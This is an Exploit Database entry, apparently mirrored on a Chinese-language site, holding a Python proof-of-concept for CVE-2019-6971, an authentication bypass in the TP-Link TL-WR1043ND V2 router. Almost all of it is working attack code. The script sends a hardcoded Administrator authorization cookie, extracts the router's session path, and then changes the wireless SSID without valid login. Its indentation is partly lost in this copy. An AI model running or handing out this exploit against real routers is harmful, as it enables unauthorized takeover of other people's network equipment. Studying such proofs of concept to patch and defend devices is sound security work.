TP-Link TL-WR1043ND 2 – Authentication Bypass

• Exploit Database
• 35 阅读

• 作者： Uriel Kosayev
  日期： 2019-10-10
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47483/

• # Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass
  # Date: 2019-06-20
  # Exploit Author: Uriel Kosayev
  # Vendor Homepage: https://www.tp-link.com
  # Version: TL-WR1043ND V2
  # Tested on: TL-WR1043ND V2
  # CVE : CVE-2019-6971
  # CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-6971
  
  import requests
  
  ascii = '''
  _____________ __
   /___/ __ \/ / (_)___/ /__
  / / / /_/ /_____/ / / / __ \/ //_/
   / / / ____/_____/ /___/ / / / / ,< 
  /_/ /_/ /_____/_/_/ /_/_/|_|
  
  '''
  print(ascii)
  Default_Gateway = raw_input("Enter your TP-Link router IP: ")
  
  # Constants
  url = 'http://'
  url2 = '/userRpm/LoginRpm.htm?Save=Save'
  full = url + Default_Gateway + url2
  # full = str(full)
  
  # The full GET request with the cookie authorization hijacked
  req_header = {
  'Host': '{}'.format(Default_Gateway),
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
  'Accept-Language': 'en-US,en;q=0.5',
  'Accept-Encoding': 'gzip, deflate',
  'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
  'Connection': 'close',
  'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
  'Upgrade-Insecure-Requests': '1'
  }
  
  try:
  response = requests.get(full, headers=req_header).content
  except requests.exceptions.ConnectionError:
  print("Enter a valid Default Gateway IP address\nExiting...")
  exit()
  generate = response.split('/')[3] # Gets the randomized URL "session ID"
  
  
  option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")
  
  if option_1 is 1:
  
  if generate in response:
  print('Vulnerable!\n')
  option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
  if option_2 is 2:
  newssid = raw_input('New name: ')
  ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
  newssid)
  changessid_full = url + Default_Gateway + '/' + generate + ssid_url
  requests.get(changessid_full, headers=req_header)
  print('Changed to: {}'.format(newssid))
  else:
  ("Please choose the correct option.\nExiting...")
  exit()
  else:
  print('Not Vulnerable')
  exit()
  else:
  print("Please choose the correct option.\nExiting...")
  exit()